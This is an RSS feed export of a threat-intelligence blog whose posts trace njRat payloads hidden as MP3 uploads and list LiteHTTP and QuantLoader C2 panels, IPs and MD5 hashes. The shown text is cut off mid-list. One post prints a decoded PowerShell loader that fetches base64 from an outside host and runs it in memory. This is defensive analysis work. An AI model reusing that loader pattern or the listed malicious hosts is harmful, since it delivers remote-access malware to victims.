<figure class="wp-block-image"><img decoding="async" width="1024" height="514" src="https://viriback.com/wp-content/uploads/2019/07/topdom-1-1024x514.png" alt="" class="wp-image-148" srcset="https://viriback.com/wp-content/uploads/2019/07/topdom-1-300x151.png 300w, https://viriback.com/wp-content/uploads/2019/07/topdom-1-768x386.png 768w, https://viriback.com/wp-content/uploads/2019/07/topdom-1-1024x514.png 1024w, https://viriback.com/wp-content/uploads/2019/07/topdom-1.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Top Domains</figcaption></figure>



<figure class="wp-block-image"><img decoding="async" width="771" height="571" src="https://viriback.com/wp-content/uploads/2019/07/topasn.png" alt="" class="wp-image-151" srcset="https://viriback.com/wp-content/uploads/2019/07/topasn-300x222.png 300w, https://viriback.com/wp-content/uploads/2019/07/topasn-768x569.png 768w, https://viriback.com/wp-content/uploads/2019/07/topasn.png 771w" sizes="(max-width: 771px) 100vw, 771px" /></figure>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Can you listen to Base64 ?</title>
		<link>https://viriback.com/can-you-listen-to-base64/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Fri, 28 Jun 2019 16:56:23 +0000</pubDate>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[base64]]></category>
		<category><![CDATA[encoding]]></category>
		<category><![CDATA[hex]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[regex]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=109</guid>

					<description><![CDATA[Lately I have been interested in PasteBin as a source of malware. Before I continue, if you are on twitter, @scumbots by @pmelson does it way better then I do it :) But still, I am having fun and wanted to describe a process I am doing frequently with concrete example. I was on my  [...]]]></description>
										<content:encoded><![CDATA[
<p>Lately I have been interested in PasteBin as a source of malware. Before I continue, if you are on twitter, <a href="https://twitter.com/scumbots">@scumbots</a> by <a href="https://twitter.com/pmelson">@pmelson</a> does it way better then I do it 🙂 But still, I am having fun and wanted to describe a process I am doing frequently with concrete example.</p>



<p>I was on my cell phone in a waiting room when @scumbots tweeted that it had found an njRat instance on the paste myXAXSKh. </p>



<figure class="wp-block-image"><img decoding="async" width="586" height="256" src="https://viriback.com/wp-content/uploads/2019/06/scum.png" alt="" class="wp-image-110" srcset="https://viriback.com/wp-content/uploads/2019/06/scum-300x131.png 300w, https://viriback.com/wp-content/uploads/2019/06/scum.png 586w" sizes="(max-width: 586px) 100vw, 586px" /></figure>



<p>As you can see in the screenshot this looks like char codes separated by a caret, but not quite the MZ magic bytes… so I was curious, and was trying to use <a href="https://gchq.github.io/CyberChef/">CyberChef</a> from my cell phone with only the first few chars, and it never returned an MZ header. Anyhow, as much as Cyberchef is a great tool, using it on a cell phone was not ok.</p>



<p>When I got home, I tried the code in CyberChef using this recipe:</p>



<figure class="wp-block-image"><img decoding="async" width="561" height="619" src="https://viriback.com/wp-content/uploads/2019/06/recipe.png" alt="" class="wp-image-124" srcset="https://viriback.com/wp-content/uploads/2019/06/recipe-272x300.png 272w, https://viriback.com/wp-content/uploads/2019/06/recipe.png 561w" sizes="(max-width: 561px) 100vw, 561px" /></figure>



<p>So It changed the following text from the Paste:</p>



<pre class="wp-block-code"><code>57^77^42^42^41^48^41^41^63^41^42^45^…</code></pre>



<p>to :</p>



<pre class="wp-block-code"><code>[AppDomain]::CurrentDomain.Load([Convert]::
Frombase64String((New-Object
System.Net.WebClient).Downloadstring
('http://www.asmreekasounds.com/upfiles/up_down/5de74b4422b036f72bec452a21974406.mp3')))
.EntryPoint.invoke($null,$null)</code></pre>



<p>Not quite was I was expecting. Most of the time, miscreants are lazy and will just simply Base64 their payload into a Paste, or into a simple script that they download, and then decode the base64 to a exe.</p>



<p>Nevertheless, this was still interesting, it was downloading a file with an MP3 extension to decode from Base64, I had to check what was the content of that file, so I downloaded with wget, and sure thing It contained base64 code, that once decoded would output an EXE file with MD5: d2635eea6c889ee9f341e3acaf92c152 . </p>



<figure class="wp-block-image"><img decoding="async" width="917" height="144" src="https://viriback.com/wp-content/uploads/2019/06/cli-1.png" alt="" class="wp-image-116" srcset="https://viriback.com/wp-content/uploads/2019/06/cli-1-300x47.png 300w, https://viriback.com/wp-content/uploads/2019/06/cli-1-768x121.png 768w, https://viriback.com/wp-content/uploads/2019/06/cli-1.png 917w" sizes="(max-width: 917px) 100vw, 917px" /></figure>



<p>A quick look into VT shows its detection and what seems to be a common threat name &#8220;Bladabindi&#8221; which is AKA njRat.</p>



<figure class="wp-block-image"><img decoding="async" width="770" height="427" src="https://viriback.com/wp-content/uploads/2019/06/bladi.png" alt="" class="wp-image-115" srcset="https://viriback.com/wp-content/uploads/2019/06/bladi-300x166.png 300w, https://viriback.com/wp-content/uploads/2019/06/bladi-768x426.png 768w, https://viriback.com/wp-content/uploads/2019/06/bladi.png 770w" sizes="(max-width: 770px) 100vw, 770px" /></figure>



<p>I always have a look for opendir, and this folder was indeed the case. An open directory with tons of MP3…or malware should I say. </p>



<figure class="wp-block-image"><img decoding="async" width="585" height="386" src="https://viriback.com/wp-content/uploads/2019/06/opendir.png" alt="" class="wp-image-119" srcset="https://viriback.com/wp-content/uploads/2019/06/opendir-300x198.png 300w, https://viriback.com/wp-content/uploads/2019/06/opendir.png 585w" sizes="(max-width: 585px) 100vw, 585px" /></figure>



<p>This seemed liked a legit website with an upload feature being abused.</p>



<figure class="wp-block-image"><img decoding="async" width="776" height="419" src="https://viriback.com/wp-content/uploads/2019/06/upload.png" alt="" class="wp-image-120" srcset="https://viriback.com/wp-content/uploads/2019/06/upload-300x162.png 300w, https://viriback.com/wp-content/uploads/2019/06/upload-768x415.png 768w, https://viriback.com/wp-content/uploads/2019/06/upload.png 776w" sizes="(max-width: 776px) 100vw, 776px" /></figure>



<p>Quick translation seems to show that you can only upload files with the following extensions:  &#8220;.rar, .mp3, .wav, .wma&#8221;, but does not seem to check for content type, and this would make it an Unrestricted file upload vulnerability according to OWASP.</p>



<p>Further researching the uploaded files, I soon discovered there was more of those base64 disguised in mp3 payload. I downloaded them all and found all types of text.</p>



<p>I found some Triple Base64 Executable, some double, some base64 with specific chars replaced, decimal encoded executables, some executables disguised in Hex after being base64 etc… you see the pattern, lots of layers of encoding. Nothing some regex and python cant handle.</p>



<figure class="wp-block-image"><img decoding="async" width="839" height="367" src="https://viriback.com/wp-content/uploads/2019/06/regex.png" alt="" class="wp-image-126" srcset="https://viriback.com/wp-content/uploads/2019/06/regex-300x131.png 300w, https://viriback.com/wp-content/uploads/2019/06/regex-768x336.png 768w, https://viriback.com/wp-content/uploads/2019/06/regex.png 839w" sizes="(max-width: 839px) 100vw, 839px" /></figure>



<p>In the end, I discovered 121 Exe&#8217;s, out of those, only 17 were already on Virustotal. There is more then encoded Exe, like PHP script, powershell etc&#8230;</p>



<figure class="wp-block-image"><img decoding="async" width="908" height="166" src="https://viriback.com/wp-content/uploads/2019/06/pe.png" alt="" class="wp-image-128" srcset="https://viriback.com/wp-content/uploads/2019/06/pe-300x55.png 300w, https://viriback.com/wp-content/uploads/2019/06/pe-768x140.png 768w, https://viriback.com/wp-content/uploads/2019/06/pe.png 908w" sizes="(max-width: 908px) 100vw, 908px" /></figure>



<p>Needless to say that I uploaded all the files to VT. Here is the list of MD5 for those discovered exe:</p>



<pre class="wp-block-code"><code>0106229044bc169c34921d8e7dbba9c9
03e35aa252a9812ba83cd8710799bc54
06676e2cbddc93ca759c2d4d270ae8d3
067f398e883b2da133977a796c5e94c3
077564f81c311d37f27424c058b130a6
09c0839607878047a8f57b293d9cc933
0e7b90c3c68e3cbbfbcbf55d54e99b7e
10456c5073b56e2ca51966a18a39054a
17a6709047f8295ec2d494fafcefd21d
1e1e89ec23f1757010376f9a89c3361e
1ea820ddbb58bdab0bdb3b0ac1d91ecc
1ec4af14368aaf8e419861147d39a2fe
1fafdb34be9427c0a3212dec8c0b74ae
2363f4f010e50498ffd2a66239e02a17
2447cad2bfc81354dedb022c382bd76e
2814bb696538e341c96a549e82c87857
287ccf62cf6cfe640408bc26c022b2e4
2999404c7f69dfa008e3300e772bd43b
33628565d4ba2eb203330721470d5868
34c0bf7fcf67cf5918a40a3861f7109f
35090d34410e61c38281173a83b2ef39
37ce57c74b8b00bf0149d4d65a9c80e9
386e412b57afd2a1ad321932bbbc78d5
3b0052bdb59e70ab6eb96f33c533c687
3bc03d5287d125e8fcb586b13cff98e1
3c0d927634e09d80dae0335b8e9b9b19
3dba585b7828876b6af95599b9802333
3e90879fccc0a341f984362ea2197744
3ea1a8e3b8ec71c4bf4c516958eb255d
3f98be3634b88ae1fcc042b42d040e89
419a5bfa469eb4504c36539f944ea828
41d952b79efad76860b0d91d20b425b4
42e101194909f63a1205d698477e3e0b
453b3fa00531cb58ef304e639680c71c
46eaaa7f3bfe65fd921e1555d87a1459
4735979583822605c13e8d42fb566b00
4aa9ca82a100c2e692b9ca257b1b9380
4b297d0c1d25ae7117bf65b4b53cc1a8
4cf5fd7a8f5a6bec069196daf7862ee3
5066ea87129db329aeffd4594cb6dbc4
5146a9828c4c95482bcffa9a62f6ad73
51e8719c7a03bfb448b33ce74df137d6
53272041964d3e2b680942074234188b
54cb91395cdaad9d47882533c21fc0e9
56bcac797486a2f2841083659b1668f8
573d1a7a5a4a7c5e6c78522740a4b5c4
57ef3704f5eb3e93fb58e483d9fe9cda
5bf7e0e00dd8d17c6ff8eb9ac4f0a01a
5db37525e8469100e3f19a2d2dfab2ff
602bea50a2dae0b33c592e36f0493ac5
62213f9d5c8841b6f5b8afd9bdc28ee0
625c3173bc62fe93942412fa4b0fb696
6411118dc5160de54ec10f5dda7002a6
64598f18e353f9c56eee5e1d30f76439
6afa7e02e03588692c62bfeeed86a67d
6e6b9dbfadb310faaa64867204d76f82
7372785adcc4556884d6442ffe3fe782
792f6cbf046b1dd0277b864598027bbc
79d405b85ca8a9960f49836088156844
7e9a7b8cc341a3e5c84410df0e39e647
8071ab417eb062de88fcdc722c09ec83
80c0ede0107eb91ce270457403809dd1
81a33185d99ad999b09b0506dd4fe0ee
82e094d6343e52f38df9203dd0db3bed
83de198861917b25cf676597189fcd1e
877f13b2fe1e60af8efaf0b28aa7d8b2
88677560b99ffe660b25b95d7b7dae7d
8962cd09b754dbfae1c7d88da193265a
89a0efbbe93b9928f379986f022634b6
8ab1876322022153188fb02fd73f72ae
8c1d054e75c05478e8c4a822cad4f8f7
9018a001dea96cac92d931bd48fce801
929e9d4545e63d0c33584d38ad53d658
9869c642c417173985e411a2f178d461
9ccb0d0071c02a8404b148acf9c534fc
9e6446b087bdaf822df230fd8eb1b715
9e99a0305141893a850bd0c89004439b
a1616d68ec4a0ca966a15c32c14426c3
a19257e8655754ded9adc4cf201707c8
a5762ded8111aa232a8ffb1de31f2e90
acb4e54e54a57d6b1404e10c2d4b4477
afa769806da434adaf76da9f5cf245f3
b1909a9479db3963822a133399cf4731
b334910ad32f2dd093174434afdf7dce
b55f7ac283c497162e51bd33bd61688c
b560c1bdc7dca63f41a4eb90eb3657e8
b7174917c43da704e4a2131d656a9221
b7f2b7541f365d78889b9fe3a81e0bad
bb2b5b5d34172c40c37f13a14a0089bd
bb5b47697a955332a1b3bd0fd00b0284
bf6c2e81172691cbb264142e29817b6e
c14820b567bd99399202226d6aa2b4bf
c3c7ca020f0631db2ddcfba49cef4ae2
c43346b3584a9c055463d1198800335f
c7a0479e8d351372bd93ca9c1f391320
c9c343ebcadf0cd3209c409bbb6ebb8d
cbeaa6f8ff679285822bde1b52c5e62f
cd542627ab037e6ea592af28d28f2dbb
ce9dc231fde6a489e9df5f5b243800d3
d2635eea6c889ee9f341e3acaf92c152
d31ce02c04935d0642d5aab3c0ff371b
d4b4f71454281f2d8a63c41feef8be35
d6c0f4057b6a588bfa59aeb7df78b0f8
d75ea59fef6a9ff58a5cc69e16550d8b
dc32a95818b45896a6ec11b1f56d4bfb
dd15159f4aa512aeae592bc465107693
dd37d79acd770c57d13e4b15bcecfd1f
e232d1b59457269f5cdaabe22141a6a1
e3338bfce074d7dbe23eba4e15043840
e5adf6a554abf5c9f1694265d0809ff0
e71904d8399cd94183bfacfb40e5cdfa
e8cac085008f267529f1f43186d1ab4e
efe3204a944124613ee02d68e6423399
f42365ec2627b872e1624d252991bb59
f5cc7602c09212ca86bb50576a02604e
f615272245fbf6770271fb4eca791b4d
f96329cb2ce6550ab40a2673f49a3e76
f986fb700c232cf44f429b5cf5cc56e2
fbc2273f5f3099445508c95a936da8cc
fcb97d4d2b8fa0cc7a156aa2b39db5d6
fe8da6b7adb9834bf20877b3e8b1c1fe</code></pre>



<p>The following Zip (MD5: 98bc4db3c23b6d45326251ec6f2d3941) contains all 121 files.</p>
]]></content:encoded>
					
		
		<enclosure url="http://www.asmreekasounds.com/upfiles/up_down/5de74b4422b036f72bec452a21974406.mp3" length="37548" type="audio/mpeg" />

			</item>
		<item>
		<title>Malware C2 Tracker Added</title>
		<link>https://viriback.com/malware-c2-tracker-added/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Tue, 04 Jun 2019 02:21:20 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[c2]]></category>
		<category><![CDATA[panels]]></category>
		<category><![CDATA[tracker]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=97</guid>

					<description><![CDATA[I added a Malware C2 Panels tracker on the blog. It can be located at http://tracker.viriback.com A search feature in the header is available to search for a specific malware family, or search part of a url. You can also dump the entire data in csv format. I might do a stats page, but I  [...]]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image"><a href="http://tracker.viriback.com/" target="_blank" rel="noreferrer noopener"><img decoding="async" width="1024" height="286" src="https://viriback.com/wp-content/uploads/2019/06/tracker-1-1024x286.png" alt="" class="wp-image-100" srcset="https://viriback.com/wp-content/uploads/2019/06/tracker-1-300x84.png 300w, https://viriback.com/wp-content/uploads/2019/06/tracker-1-768x215.png 768w, https://viriback.com/wp-content/uploads/2019/06/tracker-1-1024x286.png 1024w, https://viriback.com/wp-content/uploads/2019/06/tracker-1.png 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></figure>



<p>I added a Malware C2 Panels tracker on the blog. It can be located at <a href="http://tracker.viriback.com">http://tracker.viriback.com</a></p>



<p>A search feature in the header is available to search for a specific malware family, or search part of a url.</p>



<p>You can also dump the entire data in csv format.</p>



<p>I might do a stats page, but I am currenlty building the data set before I play with graphs.</p>



<p>If you have corections, requests or suggestions do not hesitate to reach to me on Twitter: <a href="https://twitter.com/ViriBack" target="_blank" rel="noreferrer noopener">@viriback</a></p>



<p>Same goes if you would like to contribute, twitter is the best way to share 😉</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Recent LiteHTTP activities and IOCs</title>
		<link>https://viriback.com/recent-litehttp-activities-and-iocs/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Fri, 29 Jun 2018 12:52:49 +0000</pubDate>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[LiteHTTP]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=77</guid>

					<description><![CDATA[This post serves as a dump of IOCs seen in the last 90 days related to LiteHTTP malware. The interest into LiteHTTP came from a bump in sighting in the month of may 2018. One particular instance of a control panel was seen repeatedly in my research on virustotal. Multiple samples were seen for the  [...]]]></description>
										<content:encoded><![CDATA[<p>This post serves as a dump of IOCs seen in the last 90 days related to LiteHTTP malware. The interest into LiteHTTP came from a bump in sighting in the month of may 2018.</p>
<p>One particular instance of a control panel was seen repeatedly in my research on virustotal. Multiple samples were seen for the first time in May on the platform. They were calling out to : hxxp://topksa[.]net/Panel/page[.]php</p>
<p>The panel of those samples was : hxxp://topksa[.]net/Panel/login/</p>
<p><img decoding="async" class="aligncenter size-full wp-image-79" src="https://viriback.com/wp-content/uploads/2018/06/litehttp.png" alt="" width="490" height="594" srcset="https://viriback.com/wp-content/uploads/2018/06/litehttp-247x300.png 247w, https://viriback.com/wp-content/uploads/2018/06/litehttp.png 490w" sizes="(max-width: 490px) 100vw, 490px" /></p>
<p>A total of 106 LiteHTTP malware samples were seen from May 2nd, 2018 to May 20th, 2018. The panel is still live at moment of writing this but sightings of new samples on VT has stopped since May 20th, 2018.</p>
<p>I also saw some other LiteHTTP panels that have been active since the 1st of April 2018, which the IOCs will be listed below:</p>
<blockquote><p>http://topksa.net/Panel/login/<br />
topksa.net<br />
212.237.55.178<br />
79dae4a5b199281f924722be1f3ca1ce<br />
67615ff09fb36efbdb2b37bb7a594d88<br />
7747340fe0465e80910abdaa202abfe5<br />
a39733bbaf88069e793f3f6b4937b545<br />
5268dfbcc1b98498480cf648d52cf5c6<br />
042b604594887802b08e4d79f29d1eb6<br />
0523a8c5c9e3e31a2ad32f6c77b1447b<br />
067abd137f315170fee9c1a1ece78df7<br />
0975201adbdc0331e24b43b9d40ea520<br />
520e7563015cf54d0b8bf003025bb56b<br />
589e9608e2ee2852e145e3470fd0d7e6<br />
643f27afbddb0ee532720c54cc0abd18<br />
64f2d05dfe9a5760594a6c6439b63100<br />
6c1d8b229bb02ee9ab3562fa8c268534<br />
733be540fd11365c3b2b8bd38914f8a0<br />
741d1f46b2b2d253b3dcd66f9f39485a<br />
7f0909ead4bd5d8f471e9f4f5b5d89c1<br />
9720c546cd771d3440aa14cb2c17df84<br />
99d0c5262e99cd6b43eb33438399e016<br />
bb293f81679dcbd098102fe707902377<br />
ccbd0192a391ec97bbaa6778285a22b4<br />
ce8e383c7c315ee27a4a2c53d494ff33<br />
ecc9511440e1cadb2864f4b757eb52bf<br />
eee5d8ba1c06afaaa5a0d1563cf9e2db<br />
49f56083538e4f0aa43873781132bd61<br />
500d9aaaa485b73610c3aec1fa686a3b<br />
63fe05d7b1951fd4660dd1857430796b<br />
768a0e0e27749d94ea4675abe4de1a8d<br />
bbf5f31d7a41d45cc68e667471c63871<br />
c2a5ab21a6e2a349fd173337cd1e0a48<br />
d3d83a8a744cb862ec67eb771d9d984a<br />
dfe58df1e543c014ac1b166402fd0e2a<br />
23f4c86f255d2cd1c85962d6552520fc<br />
306c76bb087b95ceae7a7399a2e41f4e<br />
3c84d0927a75e75b28ff4553a192b5e2<br />
418e32f2188ce2a38d1dbbf1ef05efeb<br />
490e10e390ae6995e83d4e49cb10cea4<br />
4e50a38741609c418ef2884f62e0d4af<br />
4f901b87e938ba01516313c71e6dc8a5<br />
7c86374250574fc13eaa2efb3fd9a786<br />
aa1cbbf73b761585ee0353bf8f40461b<br />
e8084007d595879f52f05f9083175d3f<br />
f398d68d59cfc3a1a3415649f8324e6b<br />
1696e4b5342fa4f1721767ec5e7f5cdc<br />
1a1fcd0e1b661b4ecc160a7772b4f46a<br />
2361397d688312d862efad87d1c0a525<br />
50de216e6a3f99abc33b025a2d8acb41<br />
65964e1d3841ea26e9552a57f0a8d37d<br />
65d808967ca7b7ba87d2d1ae9b268f77<br />
67d85a9af46ac0e4052f647561e45012<br />
70eedafb7494b27ff94781c2245d7624<br />
834e5453349b71d21783e475509f46e3<br />
881618eeffece7fea5bba2fc3e589cca<br />
b5803930438bd2578b0983cca7dcb08b<br />
bd7098ecac3678c98e9907086576292d<br />
c30afb3577826654aea95810a0e87dec<br />
dccecbd3baf3fc2e451b54bb392b01eb<br />
dd94c70d4a53ee04a7a1c25c48ac2f70<br />
e1f2104ea54aed9a7eedc954d24c2b6d<br />
e256c4d3b44c55b040e7576121b15ee3<br />
fac365dc7c1588ff054094481e33633d<br />
48f9633d03cbe781f65c76087844e2e9<br />
19b5c9f833ed1dd0b68df970a765d0f5<br />
2d4f85618adb4b1576a6414cb37db449<br />
45e5864c3a69fbb9ee3a11b6b3c26f7c<br />
977cbdd6b7e8623465e35176085dc17d<br />
9aa3bd406b254181d1a16d6d280d7490<br />
a2d955231b610626fc68510722cb27fc<br />
de80e2b7f87438e4f39414a94083c954<br />
e47313dbfac4934a866069d2c2c1a305<br />
21c7805d4227866332fc25425981b360<br />
6ebff77cfc1ab21e02d604a12ab416b4<br />
063b7db270c03c58316d6d1f17be55e6<br />
0be1d348eeceecff5817fe5c513e9172<br />
1989abbcef413c2473d71c5d868b649f<br />
3f54cc5d47fff7cf7735b0f30afa5707<br />
423fd2489703f155640ce488cc776e8f<br />
43db1aa9e2574c84f09d087efec21bc2<br />
4fcf013cda3586e3dda973cab9b5eff4<br />
629ae5236ebaec9452ff4ad47daa2d10<br />
634a92c9b1c2beb584965d15222f01aa<br />
666819caa468e2fa24f0107a3d076700<br />
6da563bef78ba94647915ae795278b42<br />
6fa88e08a3055282fd4e78a483821a0b<br />
7ebf7da0d048ce95514359644bbf1db8<br />
9b92e55cba936c390a62ff8b00b57326<br />
9c84f43ff72aff262a0fd34e26e5c811<br />
9d523a63c28d34afdbe80b7f0e080d08<br />
a3508b09f61b15d86e6a1659f3e4f05c<br />
a5eb787d733fc39a0375bf176f11a9a4<br />
a723f616e0ae03c4a9e198d04b4d8bd6<br />
b0358707ddfde044c4944396d2c7c29b<br />
c5bae65408bf00f89428fc2d200d9c48<br />
cfd77b5405814fa9022affc48c76a420<br />
da8976c966de36eb1b177a41093406c5<br />
e110d1db461441607c21c18cd42ba82c<br />
e1c375876659407ed7452504839ad6c0<br />
f27f3222353280e52793a7130e41f5c5<br />
fe1759f0600e3221d6323ee2ac5c9ace<br />
38b789e9fba006ead95c9d8a9def44bb<br />
b3a6ec4f4a4889ecd245a75458268646<br />
ec03d66b68304502b36aa765497cbd18<br />
26d95659c646f88d2b14dc71e2bc07b2<br />
5f8b7d6cae04ff17bcf7186bbf8b30d7<br />
dc3fa09bc67a9ca0f2aae55e0af4184a<br />
ed1b204cd1e6850c43b814bb96e94097</p></blockquote>
<blockquote><p>http://103.194.170.51/Panel/login/<br />
adeaada185fa73cd8b779869e10cbe91</p></blockquote>
<blockquote><p>http://172.81.133.27//lite/login/<br />
d91ad16e2e3c57dba48dfffe315e715c<br />
cff1ab09d5d582086588882e5fdf1696</p></blockquote>
<blockquote><p>http://176.223.131.228/Panel/login/<br />
18ada7caf0478dda9ca3b62dcef66c6b<br />
775cdac7ee3daa4fa462431b7f51998b<br />
b49e2dcb3aef79d61a9832d1903d101e<br />
cf992f2fc1c2ad4b8f5ad5a9410cc50f</p></blockquote>
<blockquote><p>http://62.77.155.65/Panel/login/<br />
5691ab6b01e9092578d4f3e0199a1583</p></blockquote>
<blockquote><p>http://babycute.thats.im/sociu/login/<br />
0c163243ba933d4b14a7673a9c561795</p></blockquote>
<blockquote><p>http://bananaloop.ru/Panel/login/<br />
987d46def142dc455f32e3c8ea052edb<br />
f3e02148b8f4dccf131fd24667e2f8dd</p></blockquote>
<blockquote><p>http://k9stock.com/Panel/login/<br />
671d6ad1db0e32d2626f1de297f08471</p></blockquote>
<blockquote><p>http://partnerwithuss.ru//Panel/login/<br />
39c5fb2236aac6d5a672155ba174a028</p></blockquote>
<blockquote><p>http://posalive.su/login/<br />
2615eabfac63bc5ff0418ca7edf10092</p></blockquote>
<blockquote><p>http://razilov06.hldns.ru/panel/login/<br />
543f8a019a3f886afdf3b3b4efc7a312</p></blockquote>
<blockquote><p>http://sketchie.ru/HTTP/ZzZz/login/<br />
a3e211615cddff693f73bfab8317fcdc</p></blockquote>
<blockquote><p>http://tik-media.info//login/<br />
bc9f581a808576eabe09c19a09737ff1</p></blockquote>
<blockquote><p>http://x420.me/latte/login/<br />
7f170a002757bd3c1f6fcdd61e750944<br />
7c0176ede8e8920b559eb7c7a7cd72d5<br />
d3ab4462ace2bd0ad62a9adec5b47516<br />
789388866ccb7b45d79d5e1b827211ac</p></blockquote>
<blockquote><p>http://xanull.phy.sx/Panel/login/<br />
f5549ac23c7e934efe149cd63c3ed7b5<br />
6e3050622a038866506890c1c94224eb<br />
5d1ebb7a2a459467cfcbf87acfd3c4ca</p></blockquote>
<blockquote><p>http://yylisah0.beget.tech/images/thumbs/about/informio/login/<br />
0494ef09f44c8646a3ebf79baad93417</p></blockquote>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>6 months of QuantLoader</title>
		<link>https://viriback.com/6-months-of-quantloader/</link>
		
		<dc:creator><![CDATA[Viriback]]></dc:creator>
		<pubDate>Sun, 10 Jun 2018 11:04:47 +0000</pubDate>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Quantloader]]></category>
		<guid isPermaLink="false">https://viriback.com/?p=59</guid>

					<description><![CDATA[Last december 2017, I started to actively hunt for Malware c2 web panels via virustotal submissions and open source data. I encountered 37 families of malware that had an HTTP web panels. Some are very common, like lokibot, pony, some are old, like AthenaHTTP etc... While there is no novelty to this article, it is  [...]]]></description>
										<content:encoded><![CDATA[<p><img decoding="async" class="alignright size-medium wp-image-61" src="https://viriback.com/wp-content/uploads/2018/06/quantloader-300x180.png" alt="" width="300" height="180" srcset="https://viriback.com/wp-content/uploads/2018/06/quantloader-300x180.png 300w, https://viriback.com/wp-content/uploads/2018/06/quantloader.png 493w" sizes="(max-width: 300px) 100vw, 300px" />Last december 2017, I started to actively hunt for Malware c2 web panels via virustotal submissions and open source data. I encountered 37 families of malware that had an HTTP web panels. Some are very common, like lokibot, pony, some are old, like AthenaHTTP etc&#8230;</p>
<p>While there is no novelty to this article, it is more a compilation of my observation on QuantLoader activities for the last 6 months approximatly and a collection of IOCs.</p>
<p>During that period I observed 25 different C2 web panels of QuantLoader. Some have been up not even for 24hrs while one has been up for almost half a year.</p>
<p>My methodology is simple, I look at submissions on virustotal after searching for specific queries. Searching for specififc queries permits to narrow down the submission to target families of malware. This is far from perfect as I could miss a few activities of certain family but seems to work relatively well.</p>
<p><img decoding="async" class="aligncenter size-large wp-image-74" src="https://viriback.com/wp-content/uploads/2018/06/graphquant2-1024x548.png" alt="" width="700" height="375" srcset="https://viriback.com/wp-content/uploads/2018/06/graphquant2-300x161.png 300w, https://viriback.com/wp-content/uploads/2018/06/graphquant2-768x411.png 768w, https://viriback.com/wp-content/uploads/2018/06/graphquant2-1024x548.png 1024w, https://viriback.com/wp-content/uploads/2018/06/graphquant2.png 1134w" sizes="(max-width: 700px) 100vw, 700px" /></p>
<p>Here is the list of observed panels with their first seen date, last seen date and numbers of days being up:</p>
<table class="table table-bordered table-hover table-condensed">
<tbody>
<tr>
<td>Panel_url</td>
<td>First_seen</td>
<td>Last_seen</td>
<td>Days</td>
</tr>
<tr>
<td>http://dackdack.online/api2/admin/</td>
<td>20171217</td>
<td>20180610</td>
<td>175</td>
</tr>
<tr>
<td>http://dnspod.pro/pro/admin/</td>
<td>20180220</td>
<td>20180610</td>
<td>110</td>
</tr>
<tr>
<td>http://apple-shop.tech/Gtf7xfRd3bnj/admin/</td>
<td>20171225</td>
<td>20180402</td>
<td>98</td>
</tr>
<tr>
<td>http://195.22.127.170/q/admin/</td>
<td>20180310</td>
<td>20180610</td>
<td>92</td>
</tr>
<tr>
<td>http://aleaha.info/q/admin/</td>
<td>20180309</td>
<td>20180529</td>
<td>81</td>
</tr>
<tr>
<td>http://data.michaelorth.eu/q/admin/</td>
<td>20180405</td>
<td>20180610</td>
<td>66</td>
</tr>
<tr>
<td>http://login.americapsolutions.com/q/admin/</td>
<td>20180409</td>
<td>20180610</td>
<td>62</td>
</tr>
<tr>
<td>http://mts2015stm.myjino.ru/q/admin/</td>
<td>20171217</td>
<td>20180126</td>
<td>40</td>
</tr>
<tr>
<td>http://dandiesinoz.com/scripts/backup/admin/</td>
<td>20171217</td>
<td>20180124</td>
<td>38</td>
</tr>
<tr>
<td>http://tytoldran.win/q/admin/</td>
<td>20180222</td>
<td>20180326</td>
<td>32</td>
</tr>
<tr>
<td>http://windowsreport.stream/q/admin/</td>
<td>20171217</td>
<td>20180115</td>
<td>29</td>
</tr>
<tr>
<td>http://rolwiluld.win/q/admin/</td>
<td>20180226</td>
<td>20180326</td>
<td>28</td>
</tr>
<tr>
<td>http://myyu.ru/q/admin/</td>
<td>20171217</td>
<td>20180110</td>
<td>24</td>
</tr>
<tr>
<td>http://heroskatopirango.com/391f4jda9s/a/admin/</td>
<td>20180518</td>
<td>20180610</td>
<td>23</td>
</tr>
<tr>
<td>http://myothow.com/q2/admin/</td>
<td>20180208</td>
<td>20180227</td>
<td>19</td>
</tr>
<tr>
<td>http://fortresmuch.com/q2/admin/</td>
<td>20180208</td>
<td>20180227</td>
<td>19</td>
</tr>
<tr>
<td>http://dada.grantflaskparty.com/admin/</td>
<td>20180514</td>
<td>20180527</td>
<td>13</td>
</tr>
<tr>
<td>http://rec-tube.date/carting/admin/</td>
<td>20180311</td>
<td>20180324</td>
<td>13</td>
</tr>
<tr>
<td>http://javelinkay.club/reader/admin/</td>
<td>20180331</td>
<td>20180410</td>
<td>10</td>
</tr>
<tr>
<td>http://serolotb.com/q/admin/</td>
<td>20171217</td>
<td>20171227</td>
<td>10</td>
</tr>
<tr>
<td>http://cynagotceter.in/q2/admin/</td>
<td>20180327</td>
<td>20180403</td>
<td>7</td>
</tr>
<tr>
<td>http://wassronledorhad.in/q2/admin/</td>
<td>20180307</td>
<td>20180313</td>
<td>6</td>
</tr>
<tr>
<td>http://warpje.xyz/quant/admin/</td>
<td>20180111</td>
<td>20180115</td>
<td>4</td>
</tr>
<tr>
<td>http://bima.website/admin/</td>
<td>20180318</td>
<td>20180320</td>
<td>2</td>
</tr>
<tr>
<td>http://newdawncheat.club/q/admin/</td>
<td>20180223</td>
<td>20180223</td>
<td>0</td>
</tr>
</tbody>
</table>
<p>Here is the dump of IOCs group by C2 panel urls:</p>
<blockquote><p>http://195.22.127.170/q/admin/<br />
195.22.127.170<br />
eae17082ded2153c4b9c7dc7ad7f6b7e</p></blockquote>
<blockquote><p>http://aleaha.info/q/admin/<br />
aleaha.info<br />
94.154.14.150<br />
a412294a2d5bc43e929d4be7f679b956<br />
